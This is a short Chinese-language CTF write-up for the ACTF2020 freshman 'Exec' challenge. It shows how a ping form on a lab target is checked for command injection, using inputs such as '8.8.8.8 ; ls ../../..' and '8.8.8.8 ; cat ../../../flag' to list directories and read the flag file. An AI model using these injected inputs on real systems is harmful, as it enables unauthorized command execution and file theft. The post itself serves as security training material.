文章 分类 标签 友链 关于

目录

[ACTF2020 新生赛]Exec

 收录于  类别 CTF-WriteUp
     约 266 字   预计阅读 1 分钟 
目录

[ACTF2020 新生赛]Exec

访问靶机:

https://pic.imgdb.cn/item/6534ac6bc458853aef147e63.jpg

输入8.8.8.8,点击PING

https://pic.imgdb.cn/item/6534acc7c458853aef15c54f.jpg

输入8.8.8.8 & ipconfig,从结果来看没有执行ipconfig

https://pic.imgdb.cn/item/6534b0d1c458853aef2449b3.jpg

输入8.8.8.8 ; ifconfig,从结果来看执行了ifconfig

https://pic.imgdb.cn/item/6534b12ac458853aef257724.jpg

对比以上两条命令可知:

  • 该页面存在RCE漏洞
  • 服务器为Linux系统

输入8.8.8.8 ; ls,看到当前目录下只有一个index.php

https://pic.imgdb.cn/item/6534b216c458853aef28a7be.jpg

输入8.8.8.8 ; ls ..,也没找到flag文件

https://pic.imgdb.cn/item/6534b277c458853aef29ea70.jpg

以此类推,一直往上级目录查询,直到输入8.8.8.8 ; ls ../../..,找到flag文件

https://pic.imgdb.cn/item/6534b300c458853aef2bcf6a.jpg

输入8.8.8.8 ; cat ../../../flag,得到flag

https://pic.imgdb.cn/item/6534b39ec458853aef2df824.jpg

更新于 2023-10-22
阅读原始文档
 CTFRCE漏洞
返回 | 主页